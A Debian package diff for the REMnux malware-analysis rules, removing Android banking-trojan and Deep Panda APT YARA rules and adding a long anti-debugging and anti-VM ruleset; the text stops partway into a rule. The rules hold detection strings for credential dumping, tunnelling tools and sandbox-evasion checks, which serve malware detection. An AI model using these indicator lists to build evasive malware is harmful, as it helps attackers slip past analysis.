diff -Nru remnux-rules-0.0.3/debian/changelog remnux-rules-0.0.4/debian/changelog
--- remnux-rules-0.0.3/debian/changelog	2015-05-09 01:21:36.000000000 +0000
+++ remnux-rules-0.0.4/debian/changelog	2016-06-24 20:09:09.000000000 +0000
@@ -1,5 +1,11 @@
+remnux-rules (0.0.4) trusty; urgency=medium
+
+  * Updated rules to the latest upstream version. 
+
+ -- REMnux Distribution (https://REMnux.org) <distro@remnux.org>  Fri, 24 Jun 2016 08:08:22 -0400
+
 remnux-rules (0.0.3) trusty; urgency=medium
 
   * Initial Release.
 
- -- REMnux (https://REMnux.org) <distro@remnux.org>  Fri, 08 May 2015 09:28:26 -0400
+ -- REMnux Distribution (https://REMnux.org) <distro@remnux.org>  Fri, 08 May 2015 09:28:26 -0400
diff -Nru remnux-rules-0.0.3/yara/Android_Malware.yara remnux-rules-0.0.4/yara/Android_Malware.yara
--- remnux-rules-0.0.3/yara/Android_Malware.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Android_Malware.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,26 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Android_Malware : iBanking
-{
-	meta:
-		author = "Xylitol xylitol@malwareint.com"
-		date = "2014-02-14"
-		description = "Match first two bytes, files and string present in iBanking"
-		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3166"
-		
-	strings:
-		// Generic android
-		$pk = {50 4B}
-		$file1 = "AndroidManifest.xml"
-		// iBanking related
-		$file2 = "res/drawable-xxhdpi/ok_btn.jpg"
-		$string1 = "bot_id"
-		$string2 = "type_password2"
-	condition:
-		($pk at 0 and 2 of ($file*) and ($string1 or $string2))
-}
diff -Nru remnux-rules-0.0.3/yara/Anthem_DeepPanda.yara remnux-rules-0.0.4/yara/Anthem_DeepPanda.yara
--- remnux-rules-0.0.3/yara/Anthem_DeepPanda.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Anthem_DeepPanda.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,100 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-
-/* Anthem Deep Panda APT */
-
-rule Anthem_DeepPanda_sl_txt_packed {
-	meta:
-		description = "Anthem Hack Deep Panda - ScanLine sl-txt-packed"
-		author = "Florian Roth"
-		date = "2015/02/08"
-		hash = "ffb1d8ea3039d3d5eb7196d27f5450cac0ea4f34"
-	strings:
-		$s0 = "Command line port scanner" fullword wide
-		$s1 = "sl.exe" fullword wide
-		$s2 = "CPports.txt" fullword ascii
-		$s3 = ",GET / HTTP/.}" fullword ascii
-		$s4 = "Foundstone Inc." fullword wide
-		$s9 = " 2002 Foundstone Inc." fullword wide
-		$s15 = ", Inc. 2002" fullword ascii
-		$s20 = "ICMP Time" fullword ascii
-	condition:
-		all of them
-}
-
-rule Anthem_DeepPanda_lot1 {
-	meta:
-		description = "Anthem Hack Deep Panda - lot1.tmp-pwdump"
-		author = "Florian Roth"
-		date = "2015/02/08"
-		hash = "5d201a0fb0f4a96cefc5f73effb61acff9c818e1"
-	strings:
-		$s0 = "Unable to open target process: %d, pid %d" fullword ascii
-		$s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii
-		$s2 = "Target: Failed to load SAM functions." fullword ascii
-		$s5 = "Error writing the test file %s, skipping this share" fullword ascii
-		$s6 = "Failed to create service (%s/%s), error %d" fullword ascii
-		$s8 = "Service start failed: %d (%s/%s)" fullword ascii
-		$s12 = "PwDump.exe" fullword ascii
-		$s13 = "GetAvailableWriteableShare returned an error of %ld" fullword ascii
-		$s14 = ":\\\\.\\pipe\\%s" fullword ascii
-		$s15 = "Couldn't copy %s to destination %s. (Error %d)" fullword ascii
-		$s16 = "dump logon session" fullword ascii
-		$s17 = "Timed out waiting to get our pipe back" fullword ascii
-		$s19 = "SetNamedPipeHandleState failed, error %d" fullword ascii
-		$s20 = "%s\\%s.exe" fullword ascii
-	condition:
-		10 of them
-}
-
-rule Anthem_DeepPanda_htran_exe {
-	meta:
-		description = "Anthem Hack Deep Panda - htran-exe"
-		author = "Florian Roth"
-		date = "2015/02/08"
-		hash = "38e21f0b87b3052b536408fdf59185f8b3d210b9"
-	strings:
-		$s0 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
-		$s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii
-		$s2 = "e:\\VS 2008 Project\\htran\\Release\\htran.pdb" fullword ascii
-		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
-		$s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
-		$s5 = "[-] ERROR: Must supply logfile name." fullword ascii
-		$s6 = "[-] There is a error...Create a new connection." fullword ascii
-		$s7 = "[+] Accept a Client on port %d from %s" fullword ascii
-		$s8 = "======================== htran V%s =======================" fullword ascii
-		$s9 = "[-] Socket Listen error." fullword ascii
-		$s10 = "[-] ERROR: open logfile" fullword ascii
-		$s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
-		$s12 = "[+] Make a Connection to %s:%d ......" fullword ascii
-		$s14 = "Recv %5d bytes from %s:%d" fullword ascii
-		$s15 = "[+] OK! I Closed The Two Socket." fullword ascii
-		$s16 = "[+] Waiting another Client on port:%d...." fullword ascii
-		$s17 = "[+] Accept a Client on port %d from %s ......" fullword ascii
-		$s20 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
-	condition:
-		10 of them
-}
-
-rule Anthem_DeepPanda_Trojan_Kakfum {
-	meta:
-		description = "Anthem Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll"
-		author = "Florian Roth"
-		date = "2015/02/08"
-		hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2"
-		hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f"
-	strings:
-		$s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" fullword ascii
-		$s1 = "%s\\sqlsrv32.dll" fullword ascii
-		$s2 = "%s\\sqlsrv64.dll" fullword ascii
-		$s3 = "%s\\%d.tmp" fullword ascii
-		$s4 = "ServiceMaix" fullword ascii
-		$s15 = "sqlserver" fullword ascii
-	condition:
-		all of them
-}
diff -Nru remnux-rules-0.0.3/yara/antidebug_antivm.yar remnux-rules-0.0.4/yara/antidebug_antivm.yar
--- remnux-rules-0.0.3/yara/antidebug_antivm.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/antidebug_antivm.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,1812 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+import "pe"
+
+rule DebuggerCheck__PEB : AntiDebug DebuggerCheck {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="IsDebugged"
+	condition:
+		any of them
+}
+
+rule DebuggerCheck__GlobalFlags : AntiDebug DebuggerCheck {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="NtGlobalFlags"
+	condition:
+		any of them
+}
+
+rule DebuggerCheck__QueryInfo : AntiDebug DebuggerCheck {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="QueryInformationProcess"
+	condition:
+		any of them
+}
+
+rule DebuggerCheck__RemoteAPI : AntiDebug DebuggerCheck {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="CheckRemoteDebuggerPresent"
+	condition:
+		any of them
+}
+
+rule DebuggerHiding__Thread : AntiDebug DebuggerHiding {
+	meta:
+	    Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+		weight = 1
+	strings:
+		$ ="SetInformationThread"
+	condition:
+		any of them
+}
+
+rule DebuggerHiding__Active : AntiDebug DebuggerHiding {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="DebugActiveProcess"
+	condition:
+		any of them
+}
+
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule DebuggerTiming__PerformanceCounter : AntiDebug DebuggerTiming {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="QueryPerformanceCounter"
+	condition:
+		any of them
+}
+*/
+
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule DebuggerTiming__Ticks : AntiDebug DebuggerTiming {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="GetTickCount"
+	condition:
+		any of them
+}
+*/
+
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule DebuggerOutput__String : AntiDebug DebuggerOutput {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="OutputDebugString"
+	condition:
+		any of them
+}
+*/
+
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule DebuggerException__UnhandledFilter : AntiDebug DebuggerException {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="SetUnhandledExceptionFilter"
+	condition:
+		any of them
+}
+*/
+
+rule DebuggerException__ConsoleCtrl : AntiDebug DebuggerException {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="GenerateConsoleCtrlEvent"
+	condition:
+		any of them
+}
+
+rule DebuggerException__SetConsoleCtrl : AntiDebug DebuggerException {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="SetConsoleCtrlHandler"
+	condition:
+		any of them
+}
+
+rule ThreadControl__Context : AntiDebug ThreadControl {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="SetThreadContext"
+	condition:
+		any of them
+}
+
+rule DebuggerCheck__DrWatson : AntiDebug DebuggerCheck {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="__invoke__watson"
+	condition:
+		any of them
+}
+
+rule SEH__v3 : AntiDebug SEH {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = "____except__handler3"
+		$ = "____local__unwind3"
+	condition:
+		any of them
+}
+
+rule SEH__v4 : AntiDebug SEH {
+    // VS 8.0+
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = "____except__handler4"
+		$ = "____local__unwind4"
+		$ = "__XcptFilter"
+	condition:
+		any of them
+}
+
+rule SEH__vba : AntiDebug SEH {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = "vbaExceptHandler"
+	condition:
+		any of them
+}
+
+rule SEH__vectored : AntiDebug SEH {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = "AddVectoredExceptionHandler"
+		$ = "RemoveVectoredExceptionHandler"
+	condition:
+		any of them
+}
+
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule DebuggerPattern__RDTSC : AntiDebug DebuggerPattern {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = {0F 31}
+	condition:
+		any of them
+}
+*/
+
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule DebuggerPattern__CPUID : AntiDebug DebuggerPattern {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = {0F A2}
+	condition:
+		any of them
+}
+*/
+
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule DebuggerPattern__SEH_Saves : AntiDebug DebuggerPattern {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = {64 ff 35 00 00 00 00}
+	condition:
+		any of them
+}
+*/
+
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule DebuggerPattern__SEH_Inits : AntiDebug DebuggerPattern {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = {64 89 25 00 00 00 00}
+	condition:
+		any of them
+}
+*/
+
+
+rule Check_Dlls
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for common sandbox dlls"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$dll1 = "sbiedll.dll" wide nocase ascii fullword
+		$dll2 = "dbghelp.dll" wide nocase ascii fullword
+		$dll3 = "api_log.dll" wide nocase ascii fullword
+		$dll4 = "dir_watch.dll" wide nocase ascii fullword
+		$dll5 = "pstorec.dll" wide nocase ascii fullword
+		$dll6 = "vmcheck.dll" wide nocase ascii fullword
+		$dll7 = "wpespy.dll" wide nocase ascii fullword
+	condition:
+		2 of them
+}
+
+rule Check_Qemu_Description
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for QEMU systembiosversion key"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$key = "HARDWARE\\Description\\System" nocase wide ascii
+		$value = "SystemBiosVersion" nocase wide ascii
+		$data = "QEMU" wide nocase ascii
+	condition:
+		all of them
+}
+
+rule Check_Qemu_DeviceMap
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for Qemu reg keys"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$key = "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0" nocase wide ascii
+		$value = "Identifier" nocase wide ascii
+		$data = "QEMU" wide nocase ascii
+	condition:
+		all of them
+}
+
+rule Check_VBox_Description
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks Vbox description reg key"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$key = "HARDWARE\\Description\\System" nocase wide ascii
+		$value = "SystemBiosVersion" nocase wide ascii
+		$data = "VBOX" nocase wide ascii		
+	condition:
+		all of them
+}
+rule Check_VBox_DeviceMap
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks Vbox registry keys"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$key = "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0" nocase wide ascii
+		$value = "Identifier" nocase wide ascii
+		$data = "VBOX" nocase wide ascii
+	condition:
+		all of them
+}
+rule Check_VBox_Guest_Additions
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for the existence of the guest additions registry key"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$key = "SOFTWARE\\Oracle\\VirtualBox Guest Additions" wide ascii nocase
+	condition:
+		any of them	
+}
+rule Check_VBox_VideoDrivers
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for reg keys of Vbox video drivers"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$key = "HARDWARE\\Description\\System" nocase wide ascii
+		$value = "VideoBiosVersion" wide nocase ascii
+		$data = "VIRTUALBOX" nocase wide ascii
+	condition:
+		all of them
+}
+rule Check_VMWare_DeviceMap
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for the existence of VmWare Registry Keys"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$key = "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0" wide ascii nocase
+		$value = "Identifier" wide nocase ascii
+		$data = "VMware" wide nocase ascii
+	condition:
+		all of them
+}
+rule Check_VmTools
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for the existence of VmTools reg key"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$ ="SOFTWARE\\VMware, Inc.\\VMware Tools" nocase ascii wide
+	condition:
+		any of them
+}
+rule Check_Wine
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for the existence of Wine"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$ ="wine_get_unix_file_name"
+	condition:
+		any of them
+}
+
+rule vmdetect
+{
+    meta:
+        author = "nex"
+        description = "Possibly employs anti-virtualization techniques"
+
+    strings:
+        // Binary tricks
+        $vmware = {56 4D 58 68}
+        $virtualpc = {0F 3F 07 0B}
+        $ssexy = {66 0F 70 ?? ?? 66 0F DB ?? ?? ?? ?? ?? 66 0F DB ?? ?? ?? ?? ?? 66 0F EF}
+        $vmcheckdll = {45 C7 00 01}
+        $redpill = {0F 01 0D 00 00 00 00 C3}
+
+        // Random strings
+        $vmware1 = "VMXh"
+        $vmware2 = "Ven_VMware_" nocase
+        $vmware3 = "Prod_VMware_Virtual_" nocase
+        $vmware4 = "hgfs.sys" nocase
+        $vmware5 = "mhgfs.sys" nocase
+        $vmware6 = "prleth.sys" nocase
+        $vmware7 = "prlfs.sys" nocase
+        $vmware8 = "prlmouse.sys" nocase
+        $vmware9 = "prlvideo.sys" nocase
+        $vmware10 = "prl_pv32.sys" nocase
+        $vmware11 = "vpc-s3.sys" nocase
+        $vmware12 = "vmsrvc.sys" nocase
+        $vmware13 = "vmx86.sys" nocase
+        $vmware14 = "vmnet.sys" nocase
+        $vmware15 = "vmicheartbeat" nocase
+        $vmware16 = "vmicvss" nocase
+        $vmware17 = "vmicshutdown" nocase
+        $vmware18 = "vmicexchange" nocase
+        $vmware19 = "vmdebug" nocase
+        $vmware20 = "vmmouse" nocase
+        $vmware21 = "vmtools" nocase
+        $vmware22 = "VMMEMCTL" nocase
+        $vmware23 = "vmx86" nocase
+        $vmware24 = "vmware" nocase
+        $virtualpc1 = "vpcbus" nocase
+        $virtualpc2 = "vpc-s3" nocase
+        $virtualpc3 = "vpcuhub" nocase
+        $virtualpc4 = "msvmmouf" nocase
+        $xen1 = "xenevtchn" nocase
+        $xen2 = "xennet" nocase
+        $xen3 = "xennet6" nocase
+        $xen4 = "xensvc" nocase
+        $xen5 = "xenvdb" nocase
+        $xen6 = "XenVMM" nocase
+        $virtualbox1 = "VBoxHook.dll" nocase
+        $virtualbox2 = "VBoxService" nocase
+        $virtualbox3 = "VBoxTray" nocase
+        $virtualbox4 = "VBoxMouse" nocase
+        $virtualbox5 = "VBoxGuest" nocase
+        $virtualbox6 = "VBoxSF" nocase
+        $virtualbox7 = "VBoxGuestAdditions" nocase
+        $virtualbox8 = "VBOX HARDDISK"  nocase
+
+        // MAC addresses
+        $vmware_mac_1a = "00-05-69"
+        $vmware_mac_1b = "00:05:69"
+        $vmware_mac_1c = "000569"
+        $vmware_mac_2a = "00-50-56"
+        $vmware_mac_2b = "00:50:56"
+        $vmware_mac_2c = "005056"
+        $vmware_mac_3a = "00-0C-29" nocase
+        $vmware_mac_3b = "00:0C:29" nocase
+        $vmware_mac_3c = "000C29" nocase
+        $vmware_mac_4a = "00-1C-14" nocase
+        $vmware_mac_4b = "00:1C:14" nocase
+        $vmware_mac_4c = "001C14" nocase
+        $virtualbox_mac_1a = "08-00-27"
+        $virtualbox_mac_1b = "08:00:27"
+        $virtualbox_mac_1c = "080027"
+
+    condition:
+        any of them
+}
+
+rule Check_Debugger
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Looks for both isDebuggerPresent and CheckRemoteDebuggerPresent"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	condition:
+		pe.imports("kernel32.dll","CheckRemoteDebuggerPresent") and 
+		pe.imports("kernel32.dll","IsDebuggerPresent")
+}
+
+rule Check_DriveSize
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Rule tries to catch uses of DeviceIOControl being used to get the drive size"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+
+	strings:
+		$physicaldrive = "\\\\.\\PhysicalDrive0" wide ascii nocase
+		$dwIoControlCode = {68 5c 40 07 00 [0-5] FF 15} //push 7405ch ; push esi (handle) then call deviceoiocontrol IOCTL_DISK_GET_LENGTH_INFO	
+	condition:
+		pe.imports("kernel32.dll","CreateFileA") and 	
+		pe.imports("kernel32.dll","DeviceIoControl") and 
+		$dwIoControlCode and
+		$physicaldrive
+}
+rule Check_FilePaths
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for filepaths containing popular sandbox names"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings: 
+		$path1 = "SANDBOX" wide ascii
+		$path2 = "\\SAMPLE" wide ascii
+		$path3 = "\\VIRUS" wide ascii
+	condition:
+		all of ($path*) and pe.imports("kernel32.dll","GetModuleFileNameA")
+}
+
+rule Check_UserNames
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Looks for malware checking for common sandbox usernames"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$user1 = "MALTEST" wide ascii
+		$user2 = "TEQUILABOOMBOOM" wide ascii
+		$user3 = "SANDBOX" wide ascii
+		$user4 = "VIRUS" wide ascii
+		$user5 = "MALWARE" wide ascii
+	condition:
+		all of ($user*)  and pe.imports("advapi32.dll","GetUserNameA")
+}
+
+
+rule Check_OutputDebugStringA_iat
+{
+
+	meta:
+		Author = "http://twitter.com/j0sm1"
+		Description = "Detect in IAT OutputDebugstringA"
+		Date = "20/04/2015"
+
+	condition:
+		pe.imports("kernel32.dll","OutputDebugStringA")
+}
+
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule Check_unhandledExceptionFiler_iat {
+
+	meta:
+		Author = "http://twitter.com/j0sm1"
+		Description = "it's checked if UnhandledExceptionFilter is imported" 
+		Date = "20/04/2015"
+		Reference = "http://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide#UnhandledExceptionFilter"
+		
+	condition:
+		pe.imports("kernel32.dll","UnhandledExceptionFilter")	
+}
+*/
+
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule check_RaiseException_iat {
+
+	meta:
+		Author = "http://twitter.com/j0sm1"
+		Description = "it's checked if RaiseException is imported" 
+		Date = "20/04/2015"
+		Reference = "http://waleedassar.blogspot.com.es/2012/11/ollydbg-raiseexception-bug.html"
+		
+	condition:
+		pe.imports("kernel32.dll","RaiseException")	
+}
+*/
+
+rule Check_FindWindowA_iat {
+
+	meta:
+		Author = "http://twitter.com/j0sm1"
+		Description = "it's checked if FindWindowA() is imported" 
+		Date = "20/04/2015"
+		Reference = "http://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide#OllyFindWindow"
+		
+	strings:
+		$ollydbg = "OLLYDBG"
+		$windbg = "WinDbgFrameClass"
+		
+	condition:
+		pe.imports("user32.dll","FindWindowA") and ($ollydbg or $windbg)
+}
+
+rule DebuggerCheck__MemoryWorkingSet : AntiDebug DebuggerCheck {
+	meta:
+		author = "Fernando Mercês"
+		date = "2015-06"
+		description = "Anti-debug process memory working set size check"
+		reference = "http://www.gironsec.com/blog/2015/06/anti-debugger-trick-quicky/"
+
+	condition:
+		pe.imports("kernel32.dll", "K32GetProcessMemoryInfo") and
+		pe.imports("kernel32.dll", "GetCurrentProcess")
+}
+
+rule WMI_VM_Detect : WMI_VM_Detect
+{
+    meta:
+        
+        version = 2
+        threat = "Using WMI to detect virtual machines via querying video card information"
+        behaviour_class = "Evasion"
+        author = "Joe Giron"
+        date = "2015-09-25"
+        description = "Detection of Virtual Appliances through the use of WMI for use of evasion."
+		
+		strings:
+
+		$selstr 	= "SELECT Description FROM Win32_VideoController" nocase ascii wide
+		$selstr2 	= "SELECT * FROM Win32_VideoController" nocase ascii wide
+		$vm1 		= "virtualbox graphics adapter" nocase ascii wide
+		$vm2 		= "vmware svga ii" nocase ascii wide
+		$vm3 		= "vm additions s3 trio32/64" nocase ascii wide
+		$vm4 		= "parallel" nocase ascii wide
+		$vm5 		= "remotefx" nocase ascii wide
+		$vm6 		= "cirrus logic" nocase ascii wide
+		$vm7 		= "matrox" nocase ascii wide
+		
+		condition:
+		any of ($selstr*) and any of ($vm*)
+
+
+}
+
+rule anti_dbg {
+    meta:
+        author = "x0r"
+        description = "Checks if being debugged"
+	version = "0.2"
+    strings:
+    	$d1 = "Kernel32.dll" nocase
+        $c1 = "CheckRemoteDebuggerPresent" 
+        $c2 = "IsDebuggerPresent" 
+        $c3 = "OutputDebugString" 
+        $c4 = "ContinueDebugEvent" 
+        $c5 = "DebugActiveProcess" 
+    condition:
+        $d1 and 1 of ($c*)
+}
+
+rule anti_dbgtools {
+    meta:
+        author = "x0r"
+        description = "Checks for the presence of known debug tools"
+	version = "0.1"
+    strings:
+        $f1 = "procexp.exe" nocase
+        $f2 = "procmon.exe" nocase
+        $f3 = "processmonitor.exe" nocase
+        $f4 = "wireshark.exe" nocase
+        $f5 = "fiddler.exe" nocase
+        $f6 = "windbg.exe" nocase
+        $f7 = "ollydbg.exe" nocase
+        $f8 = "winhex.exe" nocase       
+        $f9 = "processhacker.exe" nocase
+        $f10 = "hiew32.exe" nocase
+        $c11 = "\\\\.\\NTICE" 
+        $c12 = "\\\\.\\SICE" 
+        $c13 = "\\\\.\\Syser" 
+        $c14 = "\\\\.\\SyserBoot" 
+        $c15 = "\\\\.\\SyserDbgMsg" 
+    condition:
+        any of them
+}
+
+rule antisb_joesanbox {
+     meta:
+        author = "x0r"
+        description = "Anti-Sandbox checks for Joe Sandbox"
+	version = "0.1"
+    strings:
+	$p1 = "Software\\Microsoft\\Windows\\CurrentVersion" nocase
+	$c1 = "RegQueryValue" 
+	$s1 = "55274-640-2673064-23950" 
+    condition:
+        all of them
+}
+
+rule antisb_anubis {
+    meta:
+        author = "x0r"
+        description = "Anti-Sandbox checks for Anubis"
+	version = "0.1"
+    strings:
+        $p1 = "Software\\Microsoft\\Windows\\CurrentVersion" nocase
+        $c1 = "RegQueryValue" 
+        $s1 = "76487-337-8429955-22614" 
+        $s2 = "76487-640-1457236-23837" 
+    condition:
+        $p1 and $c1 and 1 of ($s*)
+}
+
+rule antisb_threatExpert {
+    meta:
+        author = "x0r"
+        description = "Anti-Sandbox checks for ThreatExpert"
+	version = "0.1"
+    strings:
+        $f1 = "dbghelp.dll" nocase 
+    condition:
+        all of them
+}
+
+rule antisb_sandboxie {
+    meta:
+        author = "x0r"
+        description = "Anti-Sandbox checks for Sandboxie"
+	version = "0.1"
+    strings:
+        $f1 = "SbieDLL.dll" nocase 
+    condition:
+        all of them
+}
+
+rule antisb_cwsandbox {
+    meta:
+        author = "x0r"
+        description = "Anti-Sandbox checks for CWSandbox"
+	version = "0.1"
+    strings:
+        $p1 = "Software\\Microsoft\\Windows\\CurrentVersion" nocase
+        $s1 = "76487-644-3177037-23510" 
+    condition:
+        all of them
+}
+
+rule antivm_virtualbox {
+    meta:
+        author = "x0r"
+        description = "AntiVM checks for VirtualBox"
+	version = "0.1"
+    strings:
+        $s1 = "VBoxService.exe" nocase
+    condition:
+        any of them
+}
+
+rule antivm_vmware {
+    meta:
+        author = "x0r"
+        description = "AntiVM checks for VMWare"
+	version = "0.1"
+    strings:
+        $s1 = "vmware.exe" nocase
+        $s2 = "vmware-authd.exe" nocase
+        $s3 = "vmware-hostd.exe" nocase
+        $s4 = "vmware-tray.exe" nocase
+        $s5 = "vmware-vmx.exe" nocase
+        $s6 = "vmnetdhcp.exe" nocase
+        $s7 = "vpxclient.exe" nocase
+    	$s8 = { b868584d56bb00000000b90a000000ba58560000ed }
+    condition:
+        any of them
+}
+
+rule antivm_bios {
+    meta:
+        author = "x0r"
+        description = "AntiVM checks for Bios version"
+	version = "0.2"
+    strings:
+        $p1 = "HARDWARE\\DESCRIPTION\\System" nocase
+        $p2 = "HARDWARE\\DESCRIPTION\\System\\BIOS" nocase
+        $c1 = "RegQueryValue" 
+        $r1 = "SystemBiosVersion" 
+        $r2 = "VideoBiosVersion" 
+        $r3 = "SystemManufacturer" 
+    condition:
+        1 of ($p*) and 1 of ($c*) and 1 of ($r*)
+}
+
+rule disable_antivirus {
+    meta:
+        author = "x0r"
+        description = "Disable AntiVirus"
+	version = "0.2"
+    strings:
